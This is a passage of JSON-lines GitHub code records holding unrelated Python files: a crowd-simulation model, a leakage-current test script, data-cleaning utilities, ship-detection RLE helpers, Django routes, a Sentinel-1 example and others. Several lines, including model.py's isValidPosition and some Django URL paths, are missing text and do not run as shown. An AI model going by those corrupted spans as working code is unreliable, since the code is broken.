__init__(self):\n \"\"\"Initialize new filter component.\"\"\"\n super().__init__()\n self.applies_to_available = True\n\n def __call__(self, dataset):\n \"\"\"Perform the filter operation on a given tabular dataset.\n\n :param dataset: dataset to perform operation on\n :type dataset: :class:`kaishi.tabular.dataset.TabularDataset`\n \"\"\"\n valid_indexes = dataset._get_indexes_with_valid_dataframe()\n targets = list(set(valid_indexes) & set(self.get_target_indexes(dataset)))\n for i in targets:\n dataset.files[i].df.drop_duplicates(inplace=True)\n","repo_name":"kungfuai/kaishi","sub_path":"kaishi/tabular/filters/duplicate_rows_each_dataframe.py","file_name":"duplicate_rows_each_dataframe.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"5954711246","text":"import random as rnd\nimport constant as c\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import defaultdict\nfrom time import sleep\n\nfrom agents import AGENT\nfrom restCell import RESTCELL\nfrom metroGenerator import METROGENERATOR\nfrom plotManager import PLOTMANAGER\n\n\nclass MODEL() :\n def __init__(self,n,m) -> None:\n self.n = n\n self.m = m\n\n self.metroGen = METROGENERATOR(n,m)\n\n self.agents = []\n self.restCells = []\n self.comfort = np.zeros((self.n,self.m))\n self.walls = np.zeros((self.n,self.m),dtype=int)\n self.walls = self.metroGen.generateBaseWalls(self.n,self.m)\n self.agent_allowed_to_stand_up = []\n\n self.verbose = True\n self.plotManager = PLOTMANAGER()\n \n def newStep(self):\n self.computeComfortMatrix()\n \n self.findGoalForEachAgent()\n\n self.findNewPosForEachAgent()\n\n self.solveConflictAndMoveAgent()\n\n if self.verbose:\n self.log()\n\n \n def log(self) -> None:\n print()\n print(\"Comfort Matrix\")\n print(self.comfort)\n\n print(\"Agent Goal\")\n for agent in self.agents:\n print(agent.goal)\n\n print(\"Agent Next Moves\")\n for agent in self.agents:\n print(agent.newPos)\n \n print(\"New agent position\")\n for agent in self.agents:\n print(agent.pos)\n print()\n\n \n def computeComfortMatrix(self) -> None:\n self.comfort = np.zeros((self.n,self.m))\n #if it's an agent, we lower the comfort :\n for agent in self.agents:\n for i in [-1,0,1] :\n for j in [-1,0,1]:\n moore = (agent.pos[0]+i, agent.pos[1]+j)\n if self.isValidPosition(moore) :\n self.comfort[moore]+= c.MalusAgent[1+i,1+j]\n \n #if it's a restcell, we add the value of its comfort: \n for restCell in self.restCells:\n #we add K_r to the comfort matrix \n self.comfort[restCell.pos]+=restCell.K_r\n \n def findGoalForEachAgent(self) -> None :\n for agent in self.agents:\n agent.findGoal(self.comfort)\n \n def findNewPosForEachAgent(self) -> None:\n\n self.conflict = defaultdict(lambda : [])\n for agent in self.agents:\n pos = agent.findNewPos()\n self.conflict[pos].append(agent)\n \n def isValidPosition(self,pos : tuple) -> bool:\n # check if position pos is in the range of our grid\n return ((0<=pos[0] None :\n #For each conflict (elements of self.conflict that have a lenth > 1)\n # Solve them by choosing a random agent\n # and the revert the newPos of the other agents to the current position\n for pos,agents in self.conflict.items():\n randomIndex = rnd.randrange(0,len(agents))\n for i,agent in enumerate(agents):\n if i == randomIndex :\n agent.pos = agent.newPos\n \n def totalComfort(self) :\n return sum(self.comfort[agent.pos] for agent in self.agents)\n\n def plot(self):\n #étape finale : faire une fonction 
qui plot ce à quoi ressemble notre wagon à la fin \n #pour l'instant le wagon est vide, il faut designer le metroGenerator\n end_disposition=np.zeros((self.n,self.m)) #à remplacer par la metromap définie dans metroGenerator \n for agent in self.agents:\n end_disposition[agent.pos]=2\n\n fig = plt.figure(figsize=(8,6))\n #plt.imshow(X,cmap=\"inferno\")\n plt.title(\"Plot 2D array of our metro\")\n plt.colorbar()\n plt.show()\n \n def plot_Nb(self):\n self.plotManager.plotNb(self)\n \n def clear(self):\n self.plotManager.clear()\n\n def play_model(self,t):\n self.plot_Nb()\n for i in range (0,t):\n self.clear() \n self.newStep()\n self.clear() \n self.plot_Nb()\n sleep(1)\n \n\nif __name__ == \"__main__\":\n mymodel = MODEL(3,4)\n mymodel.agents = [AGENT((0,0),mymodel),AGENT((1,1),mymodel)]\n mymodel.restCells = [RESTCELL((1,0),15)]\n \n mymodel.newStep()\n mymodel.newStep()\n\n \n","repo_name":"drblobfish/subway-crowd-cellular-automata","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38391645852","text":"#!/usr/bin/env python3\n# LDC_Commands.py\n\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nfrom tkinter import Tk\nfrom tkinter.filedialog import askdirectory\nfrom datetime import datetime\n\n\nclass LDC:\n \"\"\"\n Sets up the commands to control the Leakage Detection Circuit board alongside an instrument with SCPI communication\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Instantiates the class, all necessary variables and modules\n \"\"\"\n import pydrs\n from SCPI_Commands import SCPI\n\n self.drs = pydrs.SerialDRS()\n port_num = int(input(\"Insert the number of the COM port: \"))\n com_port = 'COM' + str(port_num)\n comunic_instrumentip = input(\"Insert instrument ip: \")\n self.drs.connect(com_port) # PyDRS Communication with IIB\n instrument = 'TCPIP::' + str(comunic_instrumentip) + '::inst0::INSTR'\n self.scpi = SCPI(instrument)\n self.frequency = 10\n self.period = 1 / self.frequency\n self.mean = 0\n self.maximum = 0\n self.minimum = 0\n self.ppc = 0\n self.mean_error = 0\n self.std_dev = 0\n self.test_time = 0\n self.samples = []\n self.temperature_samples = []\n self.time_samples = []\n self.error = []\n print(\"LDC functions enabled!\")\n\n def thermal_drift_test(self, duration):\n \"\"\"\n Reads the ground leakage current detected with the LDC board\n Reader thermal drift test\n\n :param duration: Duration of the measurement in seconds\n :type duration: int\n\n :return: The measured values for leakage current and thermal drift test\n :rtype: str\n \"\"\"\n self.samples.clear()\n self.time_samples.clear()\n self.error.clear()\n print(\"Acquisition in progress...\\n\")\n z = 0\n for x in range(int(self.frequency * duration)):\n current_value = self.scpi.instrument.query_ascii_values(':MEASure:CURRent:DC? 
(%s)' % '@1')\n self.temperature_samples.append((self.drs.read_bsmp_variable(52, 'float')))\n self.samples.append((self.drs.read_bsmp_variable(53, 'float'))*1000)\n self.time_samples.append(round(x * self.period, 2))\n self.error.append((current_value[0]*1000) - self.samples[x])\n time.sleep(self.period)\n np_samples = np.array(self.samples)\n np_error = np.array(self.error)\n z = z + 1\n if z == 10:\n print('\\n''\\n', (float(self.time_samples[-1])+0.1), \"s\", '\\n', (float(self.drs.read_bsmp_variable(52, 'float'))), \"°C\")\n z = 0\n self.test_time = datetime.today()\n self.mean = np_samples.mean()\n self.maximum = np_samples.max()\n self.minimum = np_samples.min()\n self.ppc = (np_samples.max() - np_samples.min())\n self.mean_error = abs(np_error.mean())\n self.std_dev = np_samples.std()\n return print(\"Mean: {0:.3f} mA\\n\"\n \"Maximum: {1:.3f} mA\\n\"\n \"Minimum: {2:.3f} mA\\n\"\n \"Peak to peak: {3:.3f} mA\\n\"\n \"Mean Error: {4:.3f} mA\\n\"\n \"Standard Deviation: {5:.3f} mA\\n\".format(self.mean, self.maximum, self.minimum,\n self.ppc, self.mean_error, self.std_dev))\n\n def save_csv_file(self, file_name='THERMAL DRIFT'):\n \"\"\"\n Saves the data of a ground leakage measurement in a csv format file\n :argument file_name: Gives a custom name to the file. Default gives 'THERMAL DRIFT'\n\n :return: A string confirming the execution\n :rtype: str\n \"\"\"\n test_name = self.test_time.strftime('%d_%m_%Y-%H_%M_%S')\n name = file_name+'-'+test_name+'.csv'\n data = [['Time'], ['Leakage Current'], ['Temperature']]\n column0 = data[0]\n column1 = data[1]\n column2 = data[2]\n for row in range(len(self.samples)):\n column0.append(self.time_samples[row])\n column1.append(self.samples[row])\n column2.append(self.temperature_samples[row])\n np.savetxt(name, [p for p in zip(column0, column1, column2)], delimiter=',', fmt='%s')\n return \"CSV current file named '{}' saved successfully!\".format(name)\n\n def plot_graphic(self, graph_name='THERMAL DRIFT'):\n \"\"\"\n Plots the graphic of the ground leakage measurement\n\n :return: Return the matplotlib window with the measurement plot\n \"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(15, 5))\n color='tab:blue'\n ax.locator_params(axis='y', tight=True, nbins=10)\n ax.locator_params(axis='x', tight=True, nbins=25)\n ax.plot(self.time_samples, self.samples)\n plt.xlabel('Time [s]')\n plt.ylabel('Leakage Current [mA]', color=color)\n plt.grid(True)\n ax1 = ax.twinx()\n color = 'tab:red'\n ax1.set_ylabel('Temperature [°C]', color=color)\n ax1.plot(self.time_samples, self.temperature_samples, color=color)\n ax1.locator_params(axis='y', tight=True, nbins=10)\n plt.title(graph_name)\n return plt.show()\n\n def save_graphic(self, graph_name='THERMAL DRIFT'):\n \"\"\"\n Saves a jpg file of the ground leakage graphic\n\n :return: Returns a string confirming the jpg file saving\n :rtype: str\n \"\"\"\n test_name = self.test_time.strftime('%d_%m_%Y-%H_%M_%S')\n name = graph_name+'-'+test_name+'.jpg'\n color = 'tab:blue'\n fig, ax = plt.subplots(1, 1, figsize=(10, 5))\n ax.locator_params(axis='y', tight=True, nbins=10)\n ax.locator_params(axis='x', tight=True, nbins=25)\n ax.plot(self.time_samples, self.samples)\n plt.xlabel('Time [s]')\n plt.ylabel('Leakage Current [mA]', color=color)\n plt.grid(True)\n ax1 = ax.twinx()\n color = 'tab:red'\n ax1.set_ylabel('Temperature [°C]', color=color)\n ax1.plot(self.time_samples, self.temperature_samples, color=color)\n ax1.locator_params(axis='y', tight=True, nbins=10)\n plt.title(graph_name)\n plt.savefig(name)\n 
plt.close()\n return \"Graphic file named '{}' saved successfully!\".format(name)\n\n def degauss(self):\n self.scpi.disable_output()\n self.drs.reset_interlocks()\n time.sleep(0.3)\n self.drs.reset_interlocks()\n time.sleep(0.15)\n return \"Degaussing process applied!\"\n\n\nif __name__ == '__main__':\n cwd = os.getcwd()\n ldc = LDC()\n read_current = float(input(\"Insert the desired current, in Amperes: \"))\n read_duration = int(input(\"Insert the duration of the ground leakage measurement, in seconds: \"))\n apply_degauss = int(input(\"Apply the degaussing process? 1(yes)/0(No):\"))\n if apply_degauss == 1:\n ldc.degauss()\n elif apply_degauss == 0:\n pass\n ldc.scpi.set_current(read_current)\n time.sleep(0.15)\n ldc.thermal_drift_test(read_duration)\n ldc.scpi.disable_output()\n ldc.plot_graphic()\n answer = int(input(\"Save plot and csv file? 1(yes)/0(No): \"))\n if answer == 1:\n Tk().withdraw()\n path = askdirectory(title='Select Folder')\n ldc_test = 'LDC_Test-'+ldc.test_time.strftime('%d_%m_%Y-%H_%M_%S')\n os.makedirs(os.path.join(path, ldc_test))\n os.chdir(os.path.join(path, ldc_test))\n ldc.save_graphic()\n ldc.save_csv_file()\n print(\"LDC Test files saved {}!\".format(ldc_test))\n os.chdir(cwd)\n exit()\n elif answer == 0:\n exit()\n","repo_name":"cnpem-sei/ldc-sw","sub_path":"LDC Board Test/Temperature_Drift.py","file_name":"Temperature_Drift.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7970072859","text":"from app.models import db, Artist\n\n\ndef seed_artists():\n fugal = Artist(\n artistname='Fugal',\n avatar='https://imgproxy.ra.co/_/quality:100/h:180/w:180/rt:fill/gravity:sm/plain//images/profiles/fugal.jpg',\n bio='Berlin-based Korean-American techno artist from Seattle. His style moves in a space of dynamic tension between dense, insistent rhythmics and nuanced emotion. A resident DJ and producer of the singular collective, secondnature.',\n user_id=1\n )\n db.session.add(fugal)\n db.session.commit()\n\n\ndef undo_artists():\n db.session.execute('TRUNCATE artists RESTART IDENTITY CASCADE;')\n db.session.commit()\n","repo_name":"nathanblaz/tunevillage-app","sub_path":"app/seeds/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"25100108432","text":"import csv\nfrom datetime import datetime\nimport logging\n\n\ndef read_data(file_path):\n ''' read csv file and split rows based on header length. 
Return fitting and missformatted data'''\n with open(file_path) as f:\n reader = csv.reader(f, delimiter=',')\n data = []\n missformatted_data = []\n for i, row in enumerate(reader):\n if i == 0:\n header_len = len(row)\n data.append(row)\n missformatted_data.append(row)\n else:\n if len(row) == header_len:\n data.append(row)\n else:\n missformatted_data.append(row)\n return data, missformatted_data\n\n\ndef filter_data(data, col_name, value):\n ''' select rows that have the specified column value '''\n filtered_data = []\n filtered_data.append(data[0])\n column_id = data[0].index(col_name)\n for row in data[1:]:\n if row[column_id] == value:\n filtered_data.append(row)\n return filtered_data\n\n\ndef join_columns(data, col_name_1, col_name_2, delimiter):\n ''' join values from two columns '''\n col_id_1 = data[0].index(col_name_1)\n col_id_2 = data[0].index(col_name_2)\n new_col = []\n for row in data[1:]:\n joined_val = delimiter.join([str(row[col_id_1]), str(row[col_id_2])])\n new_col.append(joined_val)\n return new_col\n\n\ndef add_column(data, col_name, col_values):\n ''' add new column values to the end of the rows '''\n data = data.copy()\n data[0].append(col_name)\n for row_id in range(len(data) - 1):\n data[row_id + 1].append(col_values[row_id])\n return data\n\n\ndef format_names(data):\n ''' join first and last name '''\n col_name_1 = 'CandidateFirstName'\n col_name_2 = 'CandidateLastName'\n delimiter = ' '\n joined_col_name = 'CandidateName'\n joined_values = join_columns(data, col_name_1, col_name_2, delimiter)\n data = add_column(data, joined_col_name, joined_values)\n return data\n\n\ndef convert_to_iso(data, col_name):\n ''' convert date to iso format, write None if cannot convert '''\n col_id = data[0].index(col_name)\n new_values = []\n for row in data[1:]:\n try:\n new_values.append(datetime.strptime(row[col_id], '%m/%d/%Y').date())\n except Exception as e:\n new_values.append(None)\n return new_values\n\n\ndef format_dates(data):\n ''' convert dates to ISO format and add them to data '''\n col_names = ['PeriodBegining', 'PeriodEnding']\n for col_name in col_names:\n converted_values = convert_to_iso(data, col_name)\n new_col_name = col_name + 'Iso'\n data = add_column(data, new_col_name, converted_values)\n return data\n\n\ndef find_col_ids_by_names(header, col_names):\n ''' find column ids in the header '''\n col_ids = [header.index(col_name) for col_name in col_names]\n return col_ids\n\n\ndef select_cols(data, col_names):\n ''' select columns from data'''\n selected_data = []\n col_ids = find_col_ids_by_names(data[0], col_names)\n selected_data.append([data[0][i] for i in col_ids])\n for row in data[1:]:\n selected_data.append([row[i] for i in col_ids])\n return selected_data\n\n\ndef remove_none(data, col_names):\n ''' split data into rows that contain None and those that do not '''\n clean_data = []\n rows_with_none = []\n clean_data.append(data[0])\n rows_with_none.append(data[0])\n col_ids = find_col_ids_by_names(data[0], col_names)\n for row in data[1:]:\n selected_values = [row[i] for i in col_ids]\n if None in selected_values:\n rows_with_none.append(row)\n else:\n clean_data.append(row)\n return clean_data, rows_with_none\n\n\ndef write_to_csv(data, file_name):\n with open(file_name, 'w', newline='') as f:\n writer = csv.writer(f)\n for row in data:\n writer.writerow(row)\n\n\ndef process_data(file_path, output_path, misformatted_output_path):\n ''' read, clean, format, and save data '''\n data, misformatted = read_data(file_path)\n formatted_data = filter_data(data, 'CandidateOrCommittee', 'COH')\n formatted_data = format_names(formatted_data)\n formatted_data = format_dates(formatted_data)\n clean_data, no_dates_data = remove_none(\n formatted_data, ['PeriodBeginingIso', 'PeriodEndingIso'])\n no_dates_data = select_cols(no_dates_data, data[0])\n misformatted += no_dates_data[1:]\n col_names = ['CandidateName', 'PeriodBeginingIso', 'PeriodEndingIso',\n 'TransactionID', 'TransactionType', 'TransactionAmount']\n selected_data = select_cols(clean_data, col_names)\n\n write_to_csv(selected_data, output_path)\n write_to_csv(misformatted, misformatted_output_path)\n\n\nif __name__ == '__main__':\n file_path = 'data/transactions.csv'\n output_path = 'data/processed_transactions.csv'\n misformatted_output_path = 'data/error.log'\n process_data(file_path, output_path, misformatted_output_path)\n","repo_name":"augzal/technical_task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26692470005","text":"import numpy as np\nimport pandas as pd\nfrom skimage.io import imread\nfrom skimage.transform import resize\n\n###################################################################################################\n# Define Variables\n\nimage_shape = (768, 768)\nIMG_CHANNELS = 3\nTARGET_WIDTH = 128\nTARGET_HEIGHT = 128\n\nno_mask = np.zeros(image_shape[0]*image_shape[1], dtype=np.uint8)\n\n###################################################################################################\n# Returns the run-length encoding (RLE) of the input image as a string formatted sequence.\n\ndef rle_encode(img):\n pixels = img.flatten()\n pixels = np.concatenate([[0], pixels, [0]])\n runs = np.where(pixels[1:] != pixels[:-1])[0] + 1\n runs[1::2] -= runs[::2]\n rle = ' '.join(str(x) for x in runs)\n return rle\n\n\n###################################################################################################\n# Decodes the run-length encoded (RLE) mask back into its original 2D binary mask representation.\n\ndef rle_decode(mask_rle, shape=image_shape):\n if pd.isnull(mask_rle):\n img = no_mask\n return img.reshape(shape).T\n s = mask_rle.split()\n starts, lengths = [np.asarray(x, dtype = int) for x in (s[0:][::2], s[1:][::2])]\n\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0] * shape[1], dtype = np.uint8)\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape).T\n\n\n###################################################################################################\n# Reads and preprocesses an image\n\ndef get_image(image_name):\n img = imread('data/train_v2/' + image_name)[:, :, :IMG_CHANNELS]\n img = resize(img, (TARGET_WIDTH, TARGET_HEIGHT), mode = 'constant', preserve_range = True)\n return img\n\n\n###################################################################################################\n# Decodes and preprocesses a run-length encoded (RLE) mask.\n\ndef get_mask(code):\n img = rle_decode(code)\n img = resize(img, (TARGET_WIDTH, TARGET_HEIGHT, 1), mode = 'constant', preserve_range = True)\n return img\n\n###################################################################################################\n# Reads and preprocesses test image\n\ndef get_test_image(image_name):\n img = imread('../input/test_v2/' + image_name)[:, :, :IMG_CHANNELS]\n img = resize(img, (TARGET_WIDTH, TARGET_HEIGHT), mode='constant', preserve_range=True)\n return 
img\n###################################################################################################\n# Creates a generator that yields batches of preprocessed test images.\n\ndef create_test_generator(precess_batch_size, sub_df):\n while True:\n for k, ix in sub_df.groupby(np.arange(sub_df.shape[0]) // precess_batch_size):\n imgs = []\n for index, row in ix.iterrows():\n original_img = get_test_image(row.ImageId) / 255.0\n imgs.append(original_img)\n\n imgs = np.array(imgs)\n yield imgs\n\n###################################################################################################\n# Creates a generator that yields batches of preprocessed images and corresponding masks.\n\ndef create_image_generator(precess_batch_size, data_df):\n while True:\n for k, group_df in data_df.groupby(np.arange(data_df.shape[0]) // precess_batch_size):\n imgs = []\n labels = []\n for index, row in group_df.iterrows():\n # images\n original_img = get_image(row.ImageId) / 255.0\n # masks\n mask = get_mask(row.EncodedPixels) / 255.0\n\n imgs.append(original_img)\n labels.append(mask)\n\n imgs = np.array(imgs)\n labels = np.array(labels)\n yield imgs, labels","repo_name":"Zooll51/AirbusShipDetection","sub_path":"OtherFile.py","file_name":"OtherFile.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6480248544","text":"import sys\r\ndata = []\r\nn = 100 # assuming n has a value of 100\r\nd = 0\r\nfor k in range(n): # looping from 0 to n-1\r\n a = len(data)\r\n b = sys.getsizeof(data)\r\n if b != d and a >= 1: # checking condition for finding the length and size in bytes\r\n print(\"length: {0:3d}; Size in bytes: {1:4d}\".format(a-1, d))\r\n d = b # assigning the value of b to d\r\n data.append(None)","repo_name":"Yozi47/Data-Structure-and-Algorithms-Class","sub_path":"Homework 5/R 5.2.py","file_name":"R 5.2.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1844611828","text":"from const import *\nfrom event import *\n\n\n\ndef init(self):\n self.typ = BUFF_DYNAMIC\n self.original = True\n self.visable = False\n self.name = \"烈焰小鬼\"\n self.description = \"战吼: 对最多一个角色造成1点魔法伤害。\"\n\n # Battlecry: deal 1 point of magic damage\n def warcry(self, old_event):\n \n # Check whether there is any character that can take the damage\n group = []\n for card in self.system.cards:\n if (card.place == PLACE_FIELD) and (not card.unselectable(card, self.card.player)):\n group.append(card)\n for player in self.system.players:\n if player.alive:\n group.append(player)\n if len(group) <= 0:\n return False\n \n self.system.yell(self.card, 0)\n text = \"请选择至多一个角色来造成1点魔法伤害。\"\n target = self.card.player.select(group, 1, text, 1, True, self)\n \n if len(target) <= 0:\n return False\n \n sublists = [\"fireball_sub_1\", \"fireball_sub_2\", \"fireball_sub_3\"]\n self.system.playeffect(\"fireball\", sublists, self.card, target[0])\n self.system.yell(self.card)\n \n damage = []\n for character in target:\n damage.append(1)\n param = [target, self.card, damage, DAMAGE_MAGICAL]\n event = Event(self.system, EVENT_DAMAGE, self, param)\n event.do()\n\n return True\n self.warcry = warcry\n","repo_name":"zblcm/python-StoneAsh","sub_path":"server/buffs/b0000000000_000.py","file_name":"b0000000000_000.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
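The run-length helpers in the AirbusShipDetection record above (rle_encode / rle_decode in OtherFile.py) are easiest to sanity-check on a tiny mask. The sketch below is not part of the dataset: it restates trimmed copies of both helpers (the default 768x768 shape and the pandas null check are dropped) and exercises them on a 2x2 mask, assuming only numpy is available.

import numpy as np

def rle_encode(img):
    # flatten row-major, pad with zeros so runs touching the borders are closed
    pixels = np.concatenate([[0], img.flatten(), [0]])
    runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
    runs[1::2] -= runs[::2]          # turn (start, end) pairs into (start, length)
    return ' '.join(str(x) for x in runs)

def rle_decode(mask_rle, shape):
    s = mask_rle.split()
    starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]
    starts -= 1                      # RLE starts are 1-based
    img = np.zeros(shape[0] * shape[1], dtype=np.uint8)
    for lo, hi in zip(starts, starts + lengths):
        img[lo:hi] = 1
    return img.reshape(shape).T      # transpose follows the column-major mask convention

mask = rle_decode('2 2', shape=(2, 2))   # -> [[0, 1], [1, 0]]
assert rle_encode(mask) == '2 2'         # round-trips for this symmetric mask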
+{"seq_id":"4412305761","text":"\n\n#思索再三我应该抽象出来一个叫CardGroup的概念,然后整个manger可以管理全部的CardGroup\n#一张卡牌,只能属于某一个group\nclass CardGroup():\n card_list = []\n processBar = None\n batch = None\n \"\"\"docstring for Card_manger\"\"\"\n def __init__(self,batch):\n self.batch=batch\n pass\n\n #卡牌会使用joinCardGroup(self,cardGroup:CardGroup)来加入某个卡组\n def join(self,card):\n self.card_list.append(card)\n return self\n\n #从卡组列表当中剔除掉这张卡\n def remove(self,card):\n try:\n self.card_list.remove(card)\n except Exception as e:\n #防御性质的编程\n print(\"CardGroup->remove ERROR: There is no card in card_list\")\n print(e)\n return False\n else:\n return True\n\n #返回所有的牌\n def getCardsList(self):\n return self.card_list\n\n #给这个卡组附加上一个头顶的进度条组件\n def uiAttchProcessBar(self,processBar):\n #试图去取卡组的第一张牌\n prime_card = self.card_list[0]\n #如果卡组的第一个元素是存在的\n if prime_card:\n px = prime_card.x\n py = prime_card.y + 80\n pwidth = 5 #初始的宽度,给5个像素吧\n pheight = 10\n #以上四个参数取自于card的大小,这个以后再说\n color=(255, 0, 0)\n\n processBar.x=px\n processBar.y=py\n processBar.width = pwidth\n processBar.height = pheight\n processBar.color = color\n\n self.processBar=processBar\n\n #返回这个卡组的进度条组件\n def getProcessBar(self):\n return self.processBar\n\n #移除这个卡组的进度条组件\n def removeProcessBar(self):\n self.processBar = None\n","repo_name":"lemonhall/card_game","sub_path":"card_group.py","file_name":"card_group.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9628670273","text":"from django.urls import path\n\nfrom myapp.views import alumno_view, aula_view, form_alumno, form_profesor, form_view, index_view, profesor_view\n\napp_name = 'myapp'\n\nurlpatterns = [\n path(\"\", index_view.as_view(), name=\"onlyAuthor\"),\n path(\"formulario/\", form_view.as_view(), name=\"formulario\"),\n path(\"formulario//\", aula_view, name=\"aula\"),\n \n path(\"formAlum/\", form_alumno.as_view(), name=\"formulario_alumno\"),\n path(\"formAlum//\", alumno_view, name=\"alumno\"),\n\n path(\"formProf/\", form_profesor.as_view(), name=\"formulario_profesor\"),\n path(\"formProf//\", profesor_view, name=\"profesor\"),\n\n]","repo_name":"TimRobles/Django-silabuz","sub_path":"mysite/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"69841596268","text":"from datetime import datetime\nfrom eodal.config import get_settings\nfrom eodal.core.sensors import Sentinel1\nfrom eodal.mapper.feature import Feature\nfrom eodal.mapper.filter import Filter\nfrom eodal.mapper.mapper import Mapper, MapperConfigs\nfrom shapely.geometry import box\n\nSettings = get_settings()\nSettings.USE_STAC = True\n\nif __name__ == '__main__':\n\n collection = 'sentinel1-grd'\n # define time period\n time_start = datetime(2020, 7, 1)\n time_end = datetime(2020, 7, 15)\n\n # define input geometry\n bbox = [9.0924, 47.5992, 9.2190, 47.7295]\n geom = box(*bbox)\n metadata_filters = [Filter('product_type', '==', 'RTC')]\n\n feature = Feature(\n name='Test Area',\n geometry=geom,\n epsg=4326,\n attributes={'id': 1}\n )\n mapper_configs = MapperConfigs(\n collection=collection,\n time_start=time_start,\n time_end=time_end,\n feature=feature,\n metadata_filters=metadata_filters\n )\n mapper = Mapper(mapper_configs)\n mapper.query_scenes()\n\n mapper.metadata\n\n scene_kwargs = {\n 'scene_constructor': Sentinel1.from_safe,\n 'scene_constructor_kwargs': {}\n }\n 
mapper.load_scenes(scene_kwargs=scene_kwargs)\n f = mapper.data.plot(band_selection=['VH'], figsize=(20, 10))\n","repo_name":"EOA-team/eodal","sub_path":"examples/sentinel1_mapper.py","file_name":"sentinel1_mapper.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"37"} +{"seq_id":"70994876267","text":"\"\"\"Add change_tag_expiration log type\n\nRevision ID: d8989249f8f6\nRevises: dc4af11a5f90\nCreate Date: 2017-06-21 21:18:25.948689\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'd8989249f8f6'\ndown_revision = 'dc4af11a5f90'\n\nfrom alembic import op as original_op\nfrom data.migrations.progress import ProgressWrapper\n\ndef upgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.bulk_insert(tables.logentrykind, [\n {'name': 'change_tag_expiration'},\n ])\n\n\ndef downgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.execute(tables\n .logentrykind\n .delete()\n .where(tables.logentrykind.c.name == op.inline_literal('change_tag_expiration')))\n","repo_name":"angry-tony/quay","sub_path":"data/migrations/versions/d8989249f8f6_add_change_tag_expiration_log_type.py","file_name":"d8989249f8f6_add_change_tag_expiration_log_type.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3961335328","text":"salario, horasExtras, bonificacion = input().split()\nsalario = float(salario)\nhorasExtras = int(horasExtras)\nbonificacion = int(bonificacion)\n\nhoraTrabajo = salario/186\nvalorExtra = horaTrabajo*0.35\nporctBonificacion = salario*0.055*bonificacion\nsalarioTotal = salario+((valorExtra+horaTrabajo)*horasExtras)+porctBonificacion\ndescSalud = salarioTotal*0.045\ndescPension = salarioTotal*0.045\ndescCaja = salarioTotal*0.03\npagoSueldo = salarioTotal-descCaja-descPension-descSalud\n\nprint(round(salarioTotal,1),round(pagoSueldo,1))\n","repo_name":"diegomez-ang/python","sub_path":"entregaReto.py","file_name":"entregaReto.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38062615971","text":"# -*- coding: utf-8 -*-\nnumbers = input().split()\nlist1 = list()\nfor item in numbers:\n list1.append(int(item))\nlist2 = sorted(list1)\nlist3 = sorted(list1, reverse=True)\n\nif list1 == list2:\n print('C')\nelif list1 == list3:\n print('D')\nelse:\n print('N')\n","repo_name":"Cadulox/uri-online-judge","sub_path":"Ad-Hoc/2456/cartas.py","file_name":"cartas.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20189395166","text":"import supervised_classifier\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom torch.utils.data import DataLoader, Dataset\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom support.embedding_model import Embedding_Model\n\nclass MLP_Dataset(Dataset):\n def __init__(self, dataset):\n dim1 = len(dataset)\n dim2 = len(dataset[0]['X'])\n self.X = np.zeros(shape=(dim1, dim2), dtype=np.float32)\n self.Y = np.zeros(shape=(dim1, 1), dtype=np.float32)\n for idx, a in enumerate(dataset):\n self.X[idx] = a['X']\n self.Y[idx][0] = a['Y']\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, index):\n x = self.X[index]\n y = self.Y[index]\n return x, 
